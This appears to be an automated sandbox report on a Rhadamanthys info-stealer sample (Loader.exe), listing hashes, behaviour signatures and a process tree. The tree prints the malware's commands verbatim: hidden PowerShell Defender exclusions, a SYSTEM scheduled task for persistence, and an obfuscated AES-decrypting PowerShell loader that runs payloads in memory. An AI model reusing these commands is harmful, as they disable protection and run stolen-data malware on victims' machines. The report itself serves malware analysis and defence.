Analysis
- max time kernel: 146s
- max time network: 155s
- platform: windows10-2004_x64
- resource: win10v2004-20240226-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 04-04-2024 12:27
- Static task static1
- Behavioral task behavioral1: sample Loader.exe, resource win7-20240221-en
- Behavioral task behavioral2: sample Loader.exe, resource win10v2004-20240226-en
- Behavioral task behavioral3: sample opengl32.dll, resource win7-20240221-en
- Behavioral task behavioral4: sample opengl32.dll, resource win10v2004-20240226-en
General
- Target: Loader.exe
- Size: 69.9MB
- MD5: 0e3f59387c131274d399813d1d95d80c
- SHA1: f09cce4678a762cfe87dbc5c8b68f9a951afebb2
- SHA256: 558be4bca2165d9e1335330cfacc0ff3c175ed21dfe17c7421b3b1bae6348a6a
- SHA512: fc04a75b47d0780212971e7a1db91df5f4d98ed796379bea053fb2c2578b3de42a6da561ce1579479f6f5088a06ff32d6945ac5fe112a5ca236f5453c60e54e1
- SSDEEP: 393216:S0tsUElbLI3r6B6Xlek/Kez3sFumIYUDfLFokwsWtjGHx:SEIHIjlek/KY4bIYU7/wsfx
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
- powershell.exe (PID 964) created svchost.exe (PID 2896)
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
- driver1.exe (PID 656)
Program crash 2 IoCs
Processes:
- WerFault.exe (PID 4060), target process powershell.exe (PID 964)
- WerFault.exe (PID 3332), target process powershell.exe (PID 964)
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
GoLang User-Agent 3 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
- flow 15: HTTP User-Agent header Go-http-client/1.1
- flow 16: HTTP User-Agent header Go-http-client/1.1
- flow 17: HTTP User-Agent header Go-http-client/1.1
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
- powershell.exe (PID 3656), recorded 2 times
- powershell.exe (PID 716), recorded 2 times
- powershell.exe (PID 964), recorded 4 times
- powershell.exe (PID 1508), recorded 2 times
- dialer.exe (PID 3892), recorded 4 times
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
- WMIC.exe (PID 3120), each token recorded twice: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- powershell.exe (PID 3656): SeDebugPrivilege
- powershell.exe (PID 716): SeDebugPrivilege
- powershell.exe (PID 964): SeDebugPrivilege
- powershell.exe (PID 1508): SeDebugPrivilege
Suspicious use of WriteProcessMemory 29 IoCs
Processes:
- Loader.exe (PID 2972) wrote to memory of cmd.exe (PID 3604), 2 times
- cmd.exe (PID 3604) wrote to memory of WMIC.exe (PID 3120), 2 times
- Loader.exe (PID 2972) wrote to memory of powershell.exe (PID 3656), 2 times
- Loader.exe (PID 2972) wrote to memory of powershell.exe (PID 716), 2 times
- Loader.exe (PID 2972) wrote to memory of driver1.exe (PID 656), 2 times
- Loader.exe (PID 2972) wrote to memory of cmd.exe (PID 3940), 2 times
- cmd.exe (PID 3940) wrote to memory of cmd.exe (PID 4856), 2 times
- cmd.exe (PID 4856) wrote to memory of cmd.exe (PID 1236), 2 times
- cmd.exe (PID 4856) wrote to memory of powershell.exe (PID 964), 3 times
- Loader.exe (PID 2972) wrote to memory of schtasks.exe (PID 4348), 2 times
- powershell.exe (PID 964) wrote to memory of powershell.exe (PID 1508), 3 times
- powershell.exe (PID 964) wrote to memory of dialer.exe (PID 3892), 5 times
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
- C:\Windows\system32\svchost.exe (PID 2896): C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
  - C:\Windows\SysWOW64\dialer.exe (PID 3892): "C:\Windows\system32\dialer.exe"
    Signatures: Suspicious behavior: EnumeratesProcesses
- C:\Users\Admin\AppData\Local\Temp\Loader.exe (PID 2972): "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe (PID 3604): cmd /C "wmic path win32_VideoController get name"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\Wbem\WMIC.exe (PID 3120): wmic path win32_VideoController get name
      Signatures: Detects videocard installed; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3656): powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\""
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 716): powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath \"C:\ProgramData\""
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\ProgramData\driver1.exe (PID 656): C:\ProgramData\driver1.exe
    Signatures: Executes dropped EXE
  - C:\Windows\system32\cmd.exe (PID 3940): C:\Windows\system32\cmd.exe /c C:\ProgramData\driver2.cmd
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe (PID 4856): C:\Windows\system32\cmd.exe /K C:\ProgramData\driver2.cmd
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe (PID 1236): C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\ProgramData\driver2.cmd';$AqEi='CrsqtpesqtpatsqtpeDesqtpcrsqtpyptsqtposqtprsqtp'.Replace('sqtp', ''),'FrCJbRoCJbRmBaCJbRseCJbR64CJbRStCJbRriCJbRnCJbRgCJbR'.Replace('CJbR', ''),'InTTXMvokTTXMeTTXM'.Replace('TTXM', ''),'EnfaNStryfaNSPoifaNSnfaNStfaNS'.Replace('faNS', ''),'ChMkDfanMkDfgeMkDfExtMkDfensMkDfioMkDfnMkDf'.Replace('MkDf', ''),'LonQgGanQgGdnQgG'.Replace('nQgG', ''),'MbgpxaibgpxnMbgpxobgpxdulbgpxebgpx'.Replace('bgpx', ''),'REtcKeEtcKadLEtcKinEtcKesEtcK'.Replace('EtcK', ''),'ElzFDsemzFDsezFDsnzFDstAzFDstzFDs'.Replace('zFDs', ''),'CenWEopenWEyenWEToenWE'.Replace('enWE', ''),'GeEAEWtCuEAEWrrEAEWenEAEWtPEAEWroEAEWcEAEWeEAEWsEAEWsEAEW'.Replace('EAEW', ''),'SpOMiiliOMiitOMii'.Replace('OMii', ''),'TrNYnSanNYnSsNYnSfNYnSorNYnSmNYnSFNYnSinaNYnSlBlNYnSocNYnSkNYnS'.Replace('NYnS', ''),'DecKPNcocKPNmpcKPNrcKPNesscKPN'.Replace('cKPN', '');powershell -w hidden;function CpemN($DYVvD){$uCDxz=[System.Security.Cryptography.Aes]::Create();$uCDxz.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uCDxz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uCDxz.Key=[System.Convert]::($AqEi[1])('hwWmx8yZnmhBXTUujLmUilT/inW7ASWUfza/yiGaTE0=');$uCDxz.IV=[System.Convert]::($AqEi[1])('1shh+Csacdi2MAxWoHL6Vw==');$WrKXJ=$uCDxz.($AqEi[0])();$lQEbS=$WrKXJ.($AqEi[12])($DYVvD,0,$DYVvD.Length);$WrKXJ.Dispose();$uCDxz.Dispose();$lQEbS;}function Vaeom($DYVvD){$ufaBC=New-Object System.IO.MemoryStream(,$DYVvD);$fvcwX=New-Object System.IO.MemoryStream;$KxhFO=New-Object System.IO.Compression.GZipStream($ufaBC,[IO.Compression.CompressionMode]::($AqEi[13]));$KxhFO.($AqEi[9])($fvcwX);$KxhFO.Dispose();$ufaBC.Dispose();$fvcwX.Dispose();$fvcwX.ToArray();}$oYEdq=[System.IO.File]::($AqEi[7])([Console]::Title);$sExPv=Vaeom (CpemN ([Convert]::($AqEi[1])([System.Linq.Enumerable]::($AqEi[8])($oYEdq, 5).Substring(2))));$uYvCe=Vaeom (CpemN ([Convert]::($AqEi[1])([System.Linq.Enumerable]::($AqEi[8])($oYEdq, 6).Substring(2))));[System.Reflection.Assembly]::($AqEi[5])([byte[]]$uYvCe).($AqEi[3]).($AqEi[2])($null,$null);[System.Reflection.Assembly]::($AqEi[5])([byte[]]$sExPv).($AqEi[3]).($AqEi[2])($null,$null); "
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 964): C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1508): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
        - C:\Windows\SysWOW64\WerFault.exe (PID 4060): C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2432
          Signatures: Program crash
        - C:\Windows\SysWOW64\WerFault.exe (PID 3332): C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2376
          Signatures: Program crash
  - C:\Windows\system32\schtasks.exe (PID 4348): schtasks /create /tn WinDriver /tr C:\ProgramData\Microsoft\WinDriver.cmd /sc onstart /ru SYSTEM
    Signatures: Creates scheduled task(s)
- C:\Windows\SysWOW64\WerFault.exe (PID 2640): C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 964 -ip 964
- C:\Windows\SysWOW64\WerFault.exe (PID 3620): C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 964 -ip 964
Network
MITRE ATT&CK Enterprise v15
Downloads